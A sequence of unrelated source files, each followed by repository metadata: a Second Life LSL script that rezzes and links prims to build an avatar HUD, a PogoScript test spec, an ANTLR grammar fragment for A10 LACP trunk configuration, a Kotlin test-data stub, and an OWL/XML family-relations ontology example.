// * Rename the former root prim of the alpha HUD mesh, if it was the rotation
// bar at the bottom name it 'rotatebar'. Remove any script if it is still
// present.
// * Rename the former root prim of the doll according to the usual doll link
// names.
// * Make any position and size adjustments as necessary to the alpha HUD mesh
// and doll, then link them both to the new HUD root prim. Make sure that
// the center square HUD prim is last so it remains the root of the linkset.
// * Remove this script from the HUD root prim and copy in the HUD script(s).
// * The other objects are also not needed any longer in the root prim and
// can be removed.
vector build_pos;
integer link_me = FALSE;
integer FINI = FALSE;
integer counter = 0;
key bar_texture;
key hud_texture;
key options_texture;
key fingernails_shape_texture;
vector bar_size = <0.5, 0.5, 0.04>;
vector hud_size = <0.5, 0.5, 0.5>;
vector color_button_size = <0.01, 0.145, 0.025>;
vector shape_button_size = <0.01, 0.295, 0.051>;
// Spew debug info
integer VERBOSE = TRUE;
// Hack to detect Second Life vs OpenSim
// Relies on a bug in llParseString2List() in SL
// http://grimore.org/fuss/lsl/bugs#splitting_strings_to_lists
// Returns TRUE when running on Second Life, FALSE on OpenSim.
integer is_SL() {
    string sa = "12999";
    // list OS = [1,2,9,9,9];  // what OpenSim's parser produces (5 elements)
    list SL = [1,2,999];        // what Second Life's parser produces (3 elements)
    list la = llParseString2List(sa, [], ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]);
    // NOTE: in LSL the == operator on lists compares *lengths*, not
    // contents, so this is TRUE iff la has 3 elements - i.e. the SL result.
    return (la == SL);
}
// The four textures used in the HUD referenced below are included in the repo:
//   bar_texture: ruth 2.0 hud header.png
//   hud_texture: ruth 2.0 hud background gradient.png
//   options_texture: ruth 2.0 hud options gradient.png
//   fingernails_shape_texture: ruth 2.0 hud fingernails shape.png
// Populate the global texture UUIDs for the grid we are running on
// (Second Life vs OSGrid); falls back to blank textures on unknown grids.
get_textures() {
    if (is_SL()) {
        // Textures in SL
        // The textures listed are full-perm uploaded by seriesumei Resident
        bar_texture = "d5aeccd4-f3ff-bea6-1296-07e8e0453275";
        hud_texture = "76dbff9c-c2fd-ffe9-a37f-cb9e42f722fe";
        options_texture = "1186285b-cc82-7602-71f0-8ad0eb1762b2";
        fingernails_shape_texture = "fb6ee827-3c3e-99a8-0e33-47015c0845a9";
    } else {
        string grid_name = "";
        // This will not compile in Second Life as it is an OpenSim-specific
        // function. Comment out the following line for SL:
        grid_name = osGetGridName();
        if (grid_name == "OSGrid") {
            // Textures in OSGrid
            // TODO: Bad assumption that OpenSim == OSGrid, how do we detect
            //       which grid?  osGetGridName() is an option but does not
            //       compile in SL so editing the script would still be required.
            //       Maybe we don't care too much about that?
            // The textures listed are full-perm uploaded by serie sumei to OSGrid
            bar_texture = "dc2612bd-e230-47f3-8888-d9a14b652f7d";
            hud_texture = "c76f327a-a431-4219-8913-78c7adfe0d02";
            options_texture = "86717f80-d201-4cf5-ab4c-1d77e5bd8e55";
            fingernails_shape_texture = "fe777245-4fa2-4834-b794-0c29fa3e1fcf";
        } else {
            // BUG FIX: the original wrote grid_name() - calling the string
            // variable as a function, which does not compile in LSL.
            log("OpenSim detected but grid " + grid_name + " unknown, using blank textures");
            bar_texture = TEXTURE_BLANK;
            hud_texture = TEXTURE_BLANK;
            options_texture = TEXTURE_BLANK;
            fingernails_shape_texture = TEXTURE_BLANK;
        }
    }
}
log(string txt) {
if (VERBOSE) {
llOwnerSay(txt);
}
}
rez_object(string name, vector delta, vector rot) {
vector build_pos = llGetPos();
build_pos += delta;;
log("Rezzing " + name);
llRezObject(
name,
build_pos,
<0.0, 0.0, 0.0>,
llEuler2Rot(rot),
0
);
}
configre_bar(string name, float offset_y) {
log("Configuring " + name);
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, name,
PRIM_TEXTURE, ALL_SIDES, bar_texture, <1.0, 0.1, 0.0>, <0.0, offset_y, 0.0>, 0.0,
PRIM_TEXTURE, 0, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 5, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_COLOR, ALL_SIDES, <1.0, 1.0, 1.0>, 1.00,
PRIM_SIZE, bar_size
]);
}
configure_color_buttons(string name) {
log("Configuring " + name);
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, name,
PRIM_COLOR, ALL_SIDES, <1.0, 1.0, 1.0>, 1.00,
PRIM_COLOR, 3, <0.3, 0.3, 0.3>, 1.00,
PRIM_COLOR, 4, <0.6, 0.6, 0.6>, 1.00,
PRIM_SIZE, color_button_size
]);
}
default {
touch_start(integer total_number) {
get_textures();
counter = 0;
// set up root prim
log("Configuring root");
llSetLinkPrimitiveParamsFast(LINK_THIS, [
PRIM_NAME, "HUD base",
PRIM_SIZE, <0.1, 0.1, 0.1>,
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <0,0,0>, <0.0, 0.455, 0.0>, 0.0,
PRIM_COLOR, ALL_SIDES, <1.0, 1.0, 1.0>, 1.00
]);
// See if we'll be able to link to trigger build
llRequestPermissions(llGetOwner(), PERMISSION_CHANGE_LINKS);
}
run_time_permissions(integer perm) {
// Only bother rezzing the object if will be able to link it.
if (perm & PERMISSION_CHANGE_LINKS) {
// log("Rezzing south");
link_me = TRUE;
rez_object("Object", <0.0, 0.0, -0.5>, <0.0, 0.0, 0.0>);
} else {
llOwnerSay("unable to link objects, aborting build");
}
}
object_rez(key id) {
counter++;
integer i = llGetNumberOfPrims();
log("counter="+(string)counter);
if (link_me) {
llCreateLink(id, TRUE);
link_me = FALSE;
}
if (counter == 1) {
configre_bar("minbar", 0.440);
// log("Rezzing east");
link_me = TRUE;
rez_object("Object", <0.0, -0.5, 0.0>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 2) {
configre_bar("optionbar", 0.065);
// log("Rezzing north");
link_me = TRUE;
rez_object("Object", <0.0, 0.0, 0.5>, <PI, 0.0, 0.0>);
}
else if (counter == 3) {
configre_bar("skinbar", 0.190);
// log("Rezzing west");
link_me = TRUE;
rez_object("Object", <0.0, 0.5, 0.0>, <PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 4) {
configre_bar("alphabar", 0.314);
log("Rezzing option HUD");
link_me = TRUE;
rez_object("Object", <0.0, -0.76953, 0.0>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 5) {
log("Configuring option HUD");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "optionbox",
PRIM_TEXTURE, ALL_SIDES, options_texture, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_COLOR, ALL_SIDES, <1.0, 1.0, 1.0>, 1.00,
PRIM_SIZE, hud_size
]);
log("Rezzing skin HUD");
link_me = TRUE;
rez_object("Object", <0.0, 0.0, 0.76953>, <PI, 0.0, 0.0>);
}
else if (counter == 6) {
log("Configuring skin HUD");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skinbox",
PRIM_TEXTURE, ALL_SIDES, hud_texture, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_COLOR, ALL_SIDES, <1.0, 1.0, 1.0>, 1.00,
PRIM_SIZE, hud_size
]);
log("Rezzing alpha HUD");
link_me = FALSE;
rez_object("alpha-hud", <0.0, 0.811, 0.0>, <PI_BY_TWO, 0.0, -PI_BY_TWO>);
}
else if (counter == 7) {
log("Rezzing alpha doll");
link_me = FALSE;
rez_object("doll", <0.0, 0.78, 0.0>, <PI_BY_TWO, 0.0, -PI_BY_TWO>);
}
else if (counter == 8) {
log("Rezzing buttons");
link_me = TRUE;
rez_object("5x button", <-0.2488, -0.6, -0.03027>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 9) {
configure_color_buttons("fnc0");
log("Rezzing buttons");
link_me = TRUE;
rez_object("5x button", <-0.2488, -0.6, 0.11965>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 10) {
configure_color_buttons("fnc1");
log("Rezzing buttons");
link_me = TRUE;
rez_object("5x button", <-0.2488, -0.64849, 0.04468>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 11) {
log("Configuring buttons");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "fns0",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 5, fingernails_shape_texture, <0.25, 1.0, 0.0>, <-0.375, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 6, fingernails_shape_texture, <0.25, 1.0, 0.0>, <-0.125, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 1, fingernails_shape_texture, <0.25, 1.0, 0.0>, <0.125, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 2, fingernails_shape_texture, <0.25, 1.0, 0.0>, <0.375, 0.0, 0.0>, 0.0,
PRIM_COLOR, ALL_SIDES, <1.0, 1.0, 1.0>, 1.00,
PRIM_COLOR, 3, <0.3, 0.3, 0.3>, 1.00,
PRIM_COLOR, 4, <0.6, 0.6, 0.6>, 1.00,
PRIM_COLOR, 0, <0.0, 0.0, 0.0>, 1.00,
PRIM_SIZE, shape_button_size
]);
log("Rezzing buttons");
link_me = TRUE;
rez_object("5x button", <-0.2488, -0.73976, -0.03027>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 12) {
configure_color_buttons("tnc0");
log("Rezzing buttons");
link_me = TRUE;
rez_object("5x button", <-0.2488, -0.73976, 0.11965>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 13) {
configure_color_buttons("tnc1");
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, -0.1, 0.6333>, <PI, 0.0, 0.0>);
}
else if (counter == 14) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin1",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, 0.1, 0.6333>, <PI, 0.0, 0.0>);
}
else if (counter == 15) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin2",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, -0.1, 0.7333>, <PI, 0.0, 0.0>);
}
else if (counter == 16) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin3",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, 0.1, 0.7333>, <PI, 0.0, 0.0>);
}
else if (counter == 17) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin4",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, -0.1, 0.8333>, <PI, 0.0, 0.0>);
}
else if (counter == 18) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin5",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, 0.1, 0.8333>, <PI, 0.0, 0.0>);
}
else if (counter == 19) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin6",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, -0.1, 0.9333>, <PI, 0.0, 0.0>);
}
else if (counter == 20) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin7",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, 0.1, 0.9333>, <PI, 0.0, 0.0>);
}
else if (counter == 21) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin8",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
}
}
}
| LSL | 4 | seriesumei/test-Ruth2 | Contrib/Serie Sumei/hud-maker.lsl | [
"MIT"
] |
script = require './scriptAssertions'
shouldOutput = script.shouldOutput
describe 'blocks'
it 'can be assigned, when given a parameter'
'a = @()
"a"
print (a())' shouldOutput "'a'"
describeOptionalsWithDelimiter (block) =
block ':'
block '='
describeOptionalsWithDelimiter @(delim)
it "can be given optional parameters with #(delim)"
"f (block) = block (optional #(delim) 'optional')
x = f @(optional #(delim) nil)
optional
print (x)" shouldOutput "'optional'"
it "can be given optional parameters after normal with #(delim)"
"f (block) = block ('arg', optional #(delim) 'optional')
x = f @(arg, optional #(delim) nil)
arg + optional
print (x)" shouldOutput "'argoptional'"
describe 'splat parameters'
it 'can accept splat parameters'
"f (block) = block (1, 2, 3)
f @(args, ...)
print (args)" shouldOutput "[ 1, 2, 3 ]"
| PogoScript | 3 | featurist/pogoscript | test/blockSpec.pogo | [
"BSD-2-Clause"
] |
parser grammar A10_lacp_trunk;
import A10_common;
options {
tokenVocab = A10Lexer;
}
// ACOS 2.X style lacp trunk definition
s_lacp_trunk: LACP_TRUNK trunk_number NEWLINE slt_definition*;
// TODO determine other allowed syntax here
// presumably overlaps some with `interface trunk` syntax
slt_definition: sltd_ports_threshold;
sltd_ports_threshold: PORTS_THRESHOLD ports_threshold NEWLINE;
| ANTLR | 4 | ton31337/batfish | projects/batfish/src/main/antlr4/org/batfish/vendor/a10/grammar/A10_lacp_trunk.g4 | [
"Apache-2.0"
] |
package
public val closure: () -> kotlin.Unit
public fun f(): kotlin.Unit
| Text | 1 | qussarah/declare | compiler/testData/diagnostics/tests/inner/referenceToSelfInLocal.txt | [
"Apache-2.0"
] |
<!DOCTYPE Ontology [
<!ENTITY xsd "http://www.w3.org/2001/XMLSchema#" >
<!ENTITY rdfs "http://www.w3.org/2000/01/rdf-schema#" >
]>
<Ontology
xml:base="http://example.com/owl/families/"
ontologyIRI="http://example.com/owl/families"
versionIRI="http://example.com/owl/families/2017-10-05/family.owl"
xmlns="http://www.w3.org/2002/07/owl#">
<Prefix name="owl" IRI="http://www.w3.org/2002/07/owl#"/>
<Prefix name="otherOnt" IRI="http://example.org/otherOntologies/families/"/>
<Annotation>
<AnnotationProperty abbreviatedIRI="owl:versionInfo"/>
<Literal>version 4.0</Literal>
</Annotation>
<Declaration>
<NamedIndividual IRI="John"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Mary"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Jim"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="James"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Jack"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Bill"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Susan"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Meg"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Eagle"/>
</Declaration>
<Declaration>
<Class IRI="Eagle"/>
</Declaration>
<Declaration>
<Class IRI="Person"/>
</Declaration>
<AnnotationAssertion>
<AnnotationProperty IRI="&rdfs;comment"/>
<IRI>Person</IRI>
<Literal>Represents the set of all people.</Literal>
</AnnotationAssertion>
<AnnotationAssertion>
<AnnotationProperty IRI="&rdfs;label"/>
<IRI>Person</IRI>
<Literal xml:lang="en">Person</Literal>
</AnnotationAssertion>
<AnnotationAssertion>
<AnnotationProperty IRI="&rdfs;label"/>
<IRI>Person</IRI>
<Literal xml:lang="es">Persona</Literal>
</AnnotationAssertion>
<AnnotationAssertion>
<AnnotationProperty IRI="fizz"/>
<IRI>Person</IRI>
<IRI>Fazz</IRI>
</AnnotationAssertion>
<Declaration>
<Class IRI="Woman"/>
</Declaration>
<Declaration>
<Class IRI="Parent"/>
</Declaration>
<Declaration>
<Class IRI="Father"/>
</Declaration>
<Declaration>
<Class IRI="Mother"/>
</Declaration>
<Declaration>
<Class IRI="SocialRole"/>
</Declaration>
<Declaration>
<Class IRI="Man"/>
</Declaration>
<Declaration>
<Class IRI="Teenager"/>
</Declaration>
<Declaration>
<Class IRI="ChildlessPerson"/>
</Declaration>
<Declaration>
<Class IRI="Human"/>
</Declaration>
<Declaration>
<Class IRI="Female"/>
</Declaration>
<Declaration>
<Class IRI="HappyPerson"/>
</Declaration>
<Declaration>
<Class IRI="JohnsChildren"/>
</Declaration>
<Declaration>
<Class IRI="NarcisticPerson"/>
</Declaration>
<Declaration>
<Class IRI="MyBirthdayGuests"/>
</Declaration>
<Declaration>
<Class IRI="Dead"/>
</Declaration>
<Declaration>
<Class IRI="Orphan"/>
</Declaration>
<Declaration>
<Class IRI="Adult"/>
</Declaration>
<Declaration>
<Class IRI="YoungChild"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasWife"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasChild"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasDaughter"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="loves"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasSpouse"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasGrandparent"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasParent"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasBrother"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasUncle"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasSon"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="#hasAncestor"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasHusband"/>
</Declaration>
<Declaration>
<DataProperty IRI="hasAge"/>
</Declaration>
<Declaration>
<DataProperty IRI="hasSSN"/>
</Declaration>
<Declaration>
<Datatype IRI="personAge"/>
</Declaration>
<Declaration>
<Datatype IRI="minorAge"/>
</Declaration>
<Declaration>
<Datatype IRI="majorAge"/>
</Declaration>
<Declaration>
<Datatype IRI="toddlerAge"/>
</Declaration>
<DatatypeDefinition>
<Datatype IRI="personAge"/>
<DatatypeRestriction>
<Datatype IRI="&xsd;integer"/>
<FacetRestriction facet="&xsd;minInclusive">
<Literal datatypeIRI="&xsd;integer">0</Literal>
</FacetRestriction>
<FacetRestriction facet="&xsd;maxInclusive">
<Literal datatypeIRI="&xsd;integer">150</Literal>
</FacetRestriction>
</DatatypeRestriction>
</DatatypeDefinition>
<DatatypeDefinition>
<Datatype IRI="minorAge"/>
<DatatypeRestriction>
<Datatype IRI="&xsd;integer"/>
<FacetRestriction facet="&xsd;minInclusive">
<Literal datatypeIRI="&xsd;integer">0</Literal>
</FacetRestriction>
<FacetRestriction facet="&xsd;maxInclusive">
<Literal datatypeIRI="&xsd;integer">18</Literal>
</FacetRestriction>
</DatatypeRestriction>
</DatatypeDefinition>
<DatatypeDefinition>
<Datatype IRI="majorAge"/>
<DataIntersectionOf>
<Datatype IRI="personAge"/>
<DataComplementOf>
<Datatype IRI="minorAge"/>
</DataComplementOf>
</DataIntersectionOf>
</DatatypeDefinition>
<DatatypeDefinition>
<Datatype IRI="toddlerAge"/>
<DataOneOf>
<Literal datatypeIRI="&xsd;integer">1</Literal>
<Literal datatypeIRI="&xsd;integer">2</Literal>
</DataOneOf>
</DatatypeDefinition>
<SymmetricObjectProperty>
<ObjectProperty IRI="hasSpouse"/>
</SymmetricObjectProperty>
<AsymmetricObjectProperty>
<ObjectProperty IRI="hasChild"/>
</AsymmetricObjectProperty>
<DisjointObjectProperties>
<ObjectProperty IRI="hasParent"/>
<ObjectProperty IRI="hasSpouse"/>
</DisjointObjectProperties>
<ReflexiveObjectProperty>
<ObjectProperty IRI="hasRelative"/>
</ReflexiveObjectProperty>
<IrreflexiveObjectProperty>
<ObjectProperty IRI="parentOf"/>
</IrreflexiveObjectProperty>
<FunctionalObjectProperty>
<ObjectProperty IRI="hasHusband"/>
</FunctionalObjectProperty>
<InverseFunctionalObjectProperty>
<ObjectProperty IRI="hasHusband"/>
</InverseFunctionalObjectProperty>
<TransitiveObjectProperty>
<ObjectProperty IRI="#hasAncestor"/>
</TransitiveObjectProperty>
<ObjectPropertyDomain>
<ObjectProperty IRI="hasWife"/>
<Class IRI="Man"/>
</ObjectPropertyDomain>
<ObjectPropertyRange>
<ObjectProperty IRI="hasWife"/>
<Class IRI="Woman"/>
</ObjectPropertyRange>
<InverseObjectProperties>
<ObjectProperty IRI="hasParent"/>
<ObjectProperty IRI="hasChild"/>
</InverseObjectProperties>
<DisjointObjectProperties>
<ObjectProperty IRI="hasSon"/>
<ObjectProperty IRI="hasDaughter"/>
</DisjointObjectProperties>
<EquivalentObjectProperties>
<ObjectProperty IRI="hasChild"/>
<ObjectProperty abbreviatedIRI="otherOnt:child"/>
</EquivalentObjectProperties>
<SubObjectPropertyOf>
<ObjectProperty IRI="hasWife"/>
<ObjectProperty IRI="hasSpouse"/>
</SubObjectPropertyOf>
<SubObjectPropertyOf>
<ObjectProperty IRI="hasFather"/>
<ObjectProperty IRI="hasParent"/>
</SubObjectPropertyOf>
<SubObjectPropertyOf>
<ObjectPropertyChain>
<ObjectProperty IRI="hasParent"/>
<ObjectProperty IRI="hasParent"/>
</ObjectPropertyChain>
<ObjectProperty IRI="hasGrandparent"/>
</SubObjectPropertyOf>
<SubObjectPropertyOf>
<ObjectPropertyChain>
<ObjectProperty IRI="hasFather"/>
<ObjectProperty IRI="hasBrother"/>
</ObjectPropertyChain>
<ObjectProperty IRI="hasUncle"/>
</SubObjectPropertyOf>
<SubObjectPropertyOf>
<ObjectPropertyChain>
<ObjectProperty IRI="hasFather"/>
<ObjectProperty IRI="hasBrother"/>
</ObjectPropertyChain>
<ObjectProperty IRI="hasUncle"/>
</SubObjectPropertyOf>
<HasKey>
<Class IRI="Person"/>
<DataProperty IRI="hasSSN"/>
</HasKey>
<DataPropertyDomain>
<DataProperty IRI="hasAge"/>
<Class IRI="Person"/>
</DataPropertyDomain>
<DataPropertyRange>
<DataProperty IRI="hasAge"/>
<Datatype IRI="&xsd;nonNegativeInteger"/>
</DataPropertyRange>
<FunctionalDataProperty>
<DataProperty IRI="hasAge"/>
</FunctionalDataProperty>
<EquivalentDataProperties>
<DataProperty IRI="hasAge"/>
<DataProperty abbreviatedIRI="otherOnt:age"/>
</EquivalentDataProperties>
<SubClassOf>
<Class IRI="Woman"/>
<Class IRI="Person"/>
</SubClassOf>
<SubClassOf>
<Class IRI="Mother"/>
<Class IRI="Woman"/>
</SubClassOf>
<SubClassOf>
<Class IRI="Grandfather"/>
<ObjectIntersectionOf>
<Class IRI="Man"/>
<Class IRI="Parent"/>
</ObjectIntersectionOf>
</SubClassOf>
<SubClassOf>
<Class IRI="Father"/>
<ObjectIntersectionOf>
<Class IRI="Man"/>
<Class IRI="Parent"/>
</ObjectIntersectionOf>
</SubClassOf>
<SubClassOf>
<Class IRI="ChildlessPerson"/>
<ObjectIntersectionOf>
<Class IRI="Person"/>
<ObjectComplementOf>
<ObjectSomeValuesFrom>
<ObjectInverseOf>
<ObjectProperty IRI="hasParent"/>
</ObjectInverseOf>
<Class abbreviatedIRI="owl:Thing"/>
</ObjectSomeValuesFrom>
</ObjectComplementOf>
</ObjectIntersectionOf>
</SubClassOf>
<SubClassOf>
<ObjectIntersectionOf>
<ObjectOneOf>
<NamedIndividual IRI="Mary"/>
<NamedIndividual IRI="Bill"/>
<NamedIndividual IRI="Meg"/>
</ObjectOneOf>
<Class IRI="Female"/>
</ObjectIntersectionOf>
<ObjectIntersectionOf>
<Class IRI="Parent"/>
<ObjectMaxCardinality cardinality="1">
<ObjectProperty IRI="hasChild"/>
</ObjectMaxCardinality>
<ObjectAllValuesFrom>
<ObjectProperty IRI="hasChild"/>
<Class IRI="Female"/>
</ObjectAllValuesFrom>
</ObjectIntersectionOf>
</SubClassOf>
<SubClassOf>
<Class IRI="Teenager"/>
<DataSomeValuesFrom>
<DataProperty IRI="hasAge"/>
<DatatypeRestriction>
<Datatype IRI="&xsd;integer"/>
<FacetRestriction facet="&xsd;minExclusive">
<Literal datatypeIRI="&xsd;integer">12</Literal>
</FacetRestriction>
<FacetRestriction facet="&xsd;maxInclusive">
<Literal datatypeIRI="&xsd;integer">19</Literal>
</FacetRestriction>
</DatatypeRestriction>
</DataSomeValuesFrom>
</SubClassOf>
<SubClassOf>
<Annotation>
<AnnotationProperty IRI="&rdfs;comment"/>
<Literal datatypeIRI="&xsd;string">"States that every man is a person."</Literal>
</Annotation>
<Class IRI="Man"/>
<Class IRI="Person"/>
</SubClassOf>
<SubClassOf>
<Class IRI="Woman"/>
<ObjectSomeValuesFrom>
<ObjectProperty IRI="hasChild"/>
<Class IRI="HappyPerson"/>
</ObjectSomeValuesFrom>
</SubClassOf>
<EquivalentClasses>
<Class IRI="HappyPerson"/>
<ObjectIntersectionOf>
<ObjectAllValuesFrom>
<ObjectProperty IRI="hasChild"/>
<Class IRI="HappyPerson"/>
</ObjectAllValuesFrom>
<ObjectSomeValuesFrom>
<ObjectProperty IRI="hasChild"/>
<Class IRI="HappyPerson"/>
</ObjectSomeValuesFrom>
</ObjectIntersectionOf>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="JohnsChildren"/>
<ObjectHasValue>
<ObjectProperty IRI="hasParent"/>
<NamedIndividual IRI="John"/>
</ObjectHasValue>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="NarcisticPerson"/>
<ObjectHasSelf>
<ObjectProperty IRI="loves"/>
</ObjectHasSelf>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="Orphan"/>
<ObjectAllValuesFrom>
<ObjectInverseOf>
<ObjectProperty IRI="hasChild"/>
</ObjectInverseOf>
<Class IRI="Dead"/>
</ObjectAllValuesFrom>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="MyBirthdayGuests"/>
<ObjectOneOf>
<NamedIndividual IRI="Bill"/>
<NamedIndividual IRI="John"/>
<NamedIndividual IRI="Mary"/>
</ObjectOneOf>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="Adult"/>
<Class abbreviatedIRI="otherOnt:Grownup"/>
</EquivalentClasses>
<EquivalentClasses>
<Class abbreviatedIRI="otherOnt:Nonchild"/>
<Class abbreviatedIRI="otherOnt:Grownup"/>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="Parent"/>
<ObjectSomeValuesFrom>
<ObjectProperty IRI="hasChild"/>
<Class IRI="Person"/>
</ObjectSomeValuesFrom>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="Person"/>
<Class IRI="Human"/>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="Mother"/>
<ObjectIntersectionOf>
<Class IRI="Woman"/>
<Class IRI="Parent"/>
</ObjectIntersectionOf>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="Parent"/>
<ObjectUnionOf>
<Class IRI="Mother"/>
<Class IRI="Father"/>
</ObjectUnionOf>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="ChildlessPerson"/>
<ObjectIntersectionOf>
<Class IRI="Person"/>
<ObjectComplementOf>
<Class IRI="Parent"/>
</ObjectComplementOf>
</ObjectIntersectionOf>
</EquivalentClasses>
<DisjointClasses>
<Class IRI="Woman"/>
<Class IRI="Man"/>
</DisjointClasses>
<DisjointClasses>
<Class IRI="Father"/>
<Class IRI="Mother"/>
<Class IRI="YoungChild"/>
</DisjointClasses>
<DifferentIndividuals>
<NamedIndividual IRI="John"/>
<NamedIndividual IRI="Bill"/>
</DifferentIndividuals>
<SameIndividual>
<NamedIndividual IRI="James"/>
<NamedIndividual IRI="Jim"/>
</SameIndividual>
<SameIndividual>
<NamedIndividual IRI="John"/>
<NamedIndividual abbreviatedIRI="otherOnt:JohnBrown"/>
</SameIndividual>
